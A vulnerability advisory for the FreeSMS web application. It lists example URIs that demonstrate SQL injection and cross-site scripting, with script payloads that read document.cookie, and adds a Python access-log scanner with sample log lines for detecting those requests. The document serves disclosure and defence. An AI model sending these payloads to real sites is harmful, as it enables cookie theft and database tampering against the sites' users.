FreeSMS Multiple Cross Site Scripting and SQL Injection Vulnerabilities
An attacker can use a browser to exploit the SQL-injection issue. The attacker must trick a victim into following a malicious URI to exploit the cross-site scripting issues.

The following example URIs are available:

http://www.example.com/freesms/pages/crc_handler.php?method=evaluation&func=getanswers&scheduleid=15{SQL_HERE}

http://www.example.com/freesms/pages/crc_handler.php?method=profile&func=%3Cscript%3Ealert%28123%29%3C/script%3E

http://www.example.com/FreeSMS/pages/crc_evaluation.php?crc=diggks5j3mlf6pee6knk34qq60&uid=3&course='"</script><script>alert(document.cookie)</script>

http://www.example.com/FreeSMS/pages/crc_login.php?crc=diggks5j3mlf6pee6knk34qq60&uid='"</script><script>alert(document.cookie)</script>

http://www.example.com/FreeSMS/pages/crc_handler.php?method=register&func=add -> Username -> '"</script><script>alert(document.cookie)</script>
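For detection, the request patterns listed above can be looked for in web-server access logs. The following is an added example, not part of the original advisory or of FreeSMS: it flags requests to the three pages named above whose query parameters carry non-numeric ids or markup characters. The log lines are constructed, and treating `scheduleid` and `uid` as integer-only is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Pages named in the advisory; matched case-insensitively because the
# advisory shows both /freesms/ and /FreeSMS/.
PAGES = ("crc_handler.php", "crc_evaluation.php", "crc_login.php")
NUMERIC = {"scheduleid", "uid"}   # assumption: these carry integer ids
MARKUP = re.compile(r"[<>'\"]")   # characters that leave an HTML/JS/SQL string context
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def findings(uri):
    """Return [(parameter, reason), ...] for one request URI."""
    parts = urlsplit(uri)
    if not parts.path.lower().endswith(PAGES):
        return []
    out = []
    # parse_qsl percent-decodes, so encoded and raw payloads look the same here.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name in NUMERIC and not re.fullmatch(r"[0-9]+", value):
            out.append((name, "non-numeric id"))
        elif MARKUP.search(value):
            out.append((name, "markup or quote character"))
    return out

def scan(log_lines):
    """Return [(uri, findings), ...] for access-log lines with findings."""
    hits = []
    for line in log_lines:
        m = REQUEST.search(line)
        if m and (found := findings(m.group(1))):
            hits.append((m.group(1), found))
    return hits

# Constructed sample lines (documentation IP range), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /freesms/pages/crc_handler.php?method=evaluation&func=getanswers&scheduleid=15 HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] "GET /freesms/pages/crc_handler.php?method=evaluation&func=getanswers&scheduleid=15%27 HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jan/2024:10:00:09 +0000] "GET /freesms/pages/crc_handler.php?method=profile&func=%3Cscript%3Ealert%28123%29%3C/script%3E HTTP/1.1" 200 301',
    '192.0.2.12 - - [01/Jan/2024:10:01:00 +0000] "GET /FreeSMS/pages/crc_login.php?crc=diggks5j3mlf6pee6knk34qq60&uid=%27%22%3C%2Fscript%3E HTTP/1.1" 200 640',
    '192.0.2.13 - - [01/Jan/2024:10:02:00 +0000] "GET /index.php?q=%3Cb%3E HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for uri, found in scan(SAMPLE_LOG):
        print(found, uri)
```

The Username field of the register form is submitted in the request body, so it does not appear in a standard access log and needs request-body logging or a WAF rule to observe.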